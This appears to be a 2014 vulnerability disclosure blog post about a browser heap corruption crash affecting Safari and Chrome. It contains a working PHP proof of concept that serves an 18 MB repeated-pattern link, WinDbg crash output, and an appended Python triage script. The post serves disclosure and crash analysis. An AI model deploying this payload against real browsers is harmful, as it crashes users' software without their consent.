Archive for August 2014

Mac OS X, iOS Chrome & Safari web browsers heap corruption bug

I think the heap-verify mechanism of Safari prevents the actual crash.

PoC 1 -> http://ibrahimbalic.com/ios2/

PoC 2 -> http://ibrahimbalic.com/nets/

PHP code:

<?php
// gzip the response so the multi-megabyte page still transfers quickly
ob_start("ob_gzhandler");
// 9-byte pattern repeated 2,000,000 times: an 18 MB href value
$ax = str_repeat("aa/aa/./a", 2000000);
?>
<html>
<head>
</head>
<body>
<!-- "href=" assumed here: the attribute name was lost in the extracted page -->
<a href="http://<?php echo $ax; ?>" id="test">test</a>
</body>
</html>

Crash:

Expected Results:
0:000:x86> .frame /r
00 0042e294 60b8cdfc CoreFoundation!CFStringEncodingSetForceASCIICompatibility+0x90
eax=00000000 ebx=06fb2d90 ecx=00000061 edx=00000000 esi=4bc90020 edi=0ab60c40
eip=60b982d7 esp=0042e284 ebp=0042e294 iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206
CoreFoundation!CFStringEncodingSetForceASCIICompatibility+0x90:
60b982d7 66890c42 mov word ptr [edx+eax*2],cx ds:002b:00000000=????
0:000:x86> ub .
CoreFoundation!CFStringEncodingSetForceASCIICompatibility+0x73:
60b982ba c3 ret
60b982bb 33c0 xor eax,eax
60b982bd 3944240c cmp dword ptr [esp+0Ch],eax
60b982c1 7e1f jle CoreFoundation!CFStringEncodingSetForceASCIICompatibility+0x9b (60b982e2)
60b982c3 8b4c2404 mov ecx,dword ptr [esp+4]
60b982c7 0fb60c08 movzx ecx,byte ptr [eax+ecx]
60b982cb 668b0c4dc898c260 mov cx,word ptr CoreFoundation!_CFDefaultEightBitStringEncoding+0x1a8 (60c298c8)[ecx*2]
60b982d3 8b542408 mov edx,dword ptr [esp+8]
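The WinDbg output above can be read mechanically: the register line gives edx and eax, the faulting instruction writes cx through [edx+eax*2], and the effective address is 0, i.e. a near-NULL write rather than a wild heap pointer. The following Python helper is an added triage example, not code from the original post; it parses the register and disassembly lines quoted above (embedded here as sample input), computes the effective address of the memory operand, and classifies the access by direction, width and whether it lands in the null page. The 0x10000 null-page threshold is an assumption chosen for illustration.

```python
import re

# Register dump and faulting instruction copied from the WinDbg output
# in the post above; used here as the sample input for the triage helper.
CRASH_DUMP = """\
eax=00000000 ebx=06fb2d90 ecx=00000061 edx=00000000 esi=4bc90020 edi=0ab60c40
eip=60b982d7 esp=0042e284 ebp=0042e294 iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206
CoreFoundation!CFStringEncodingSetForceASCIICompatibility+0x90:
60b982d7 66890c42 mov word ptr [edx+eax*2],cx ds:002b:00000000=????
"""

REG_RE = re.compile(r"\b(e[abcd]x|e[sd]i|e[sb]p|eip)=([0-9a-fA-F]{8})")
# "<addr> <opcode bytes> <mnemonic> <operands> [seg:sel:addr=value]"
INSN_RE = re.compile(
    r"^[0-9a-f]{8}\s+[0-9a-f]+\s+(?P<mn>\w+)\s+(?P<ops>.*?)"
    r"(?:\s+[a-z]{2}:[0-9a-f]{4}:\S+)?$"
)
# x86 memory operand as WinDbg prints it: SIZE ptr [base(+index*scale)(+disp)]
MEM_RE = re.compile(
    r"(?P<size>byte|word|dword) ptr \[(?P<base>e[a-z]{2})"
    r"(?:\+(?P<index>e[a-z]{2})\*(?P<scale>[1248]))?"
    r"(?:\+(?P<disp>[0-9A-Fa-f]+)h?)?\]"
)
SIZES = {"byte": 1, "word": 2, "dword": 4}
NULL_PAGE_LIMIT = 0x10000  # assumed cut-off: anything below is a near-NULL pointer


def parse_registers(dump):
    """Collect the 32-bit general registers and eip from the register lines."""
    return {name: int(val, 16) for name, val in REG_RE.findall(dump)}


def register_value(regs, name):
    """Resolve a 32-bit or 16-bit register name; None for immediates/memory."""
    if name in regs:
        return regs[name]
    if "e" + name in regs:            # cx -> low 16 bits of ecx
        return regs["e" + name] & 0xFFFF
    return None


def triage(dump):
    """Classify the faulting access from a WinDbg register/disassembly dump."""
    regs = parse_registers(dump)
    eip = regs["eip"]
    # The faulting instruction is the disassembly line whose address equals eip.
    insn = next((line for line in dump.splitlines()
                 if line.startswith(f"{eip:08x} ")), None)
    if insn is None:
        raise ValueError("no disassembly line matches eip")
    m = INSN_RE.match(insn)
    if m is None:
        raise ValueError("unrecognised disassembly line: " + insn)
    dest, _, src = m.group("ops").partition(",")
    # A memory operand in the destination slot means the instruction writes.
    mem = MEM_RE.search(dest)
    access = "write"
    if mem is None:
        mem = MEM_RE.search(src)
        access = "read"
    if mem is None:
        raise ValueError("faulting instruction has no memory operand")
    addr = regs[mem["base"]]
    if mem["index"]:
        addr += regs[mem["index"]] * int(mem["scale"])
    if mem["disp"]:
        addr += int(mem["disp"], 16)
    addr &= 0xFFFFFFFF
    return {
        "mnemonic": m.group("mn"),
        "access": access,
        "size": SIZES[mem["size"]],
        "address": addr,
        "kind": "null-page" if addr < NULL_PAGE_LIMIT else "other",
        "value": register_value(regs, src.strip()) if access == "write" else None,
    }


if __name__ == "__main__":
    r = triage(CRASH_DUMP)
    print(f"{r['access']} of {r['size']} byte(s) to 0x{r['address']:08x} "
          f"({r['kind']}), mnemonic={r['mnemonic']}, value={r['value']}")
```

Run on the dump above it reports a 2-byte write to address 0x00000000 with value 0x61 (the 'a' from the repeated payload), which is the signature of an unchecked output pointer rather than a corrupted heap chunk; that distinction is what decides whether a crash is a denial of service or something more serious, so it is worth automating before deeper analysis.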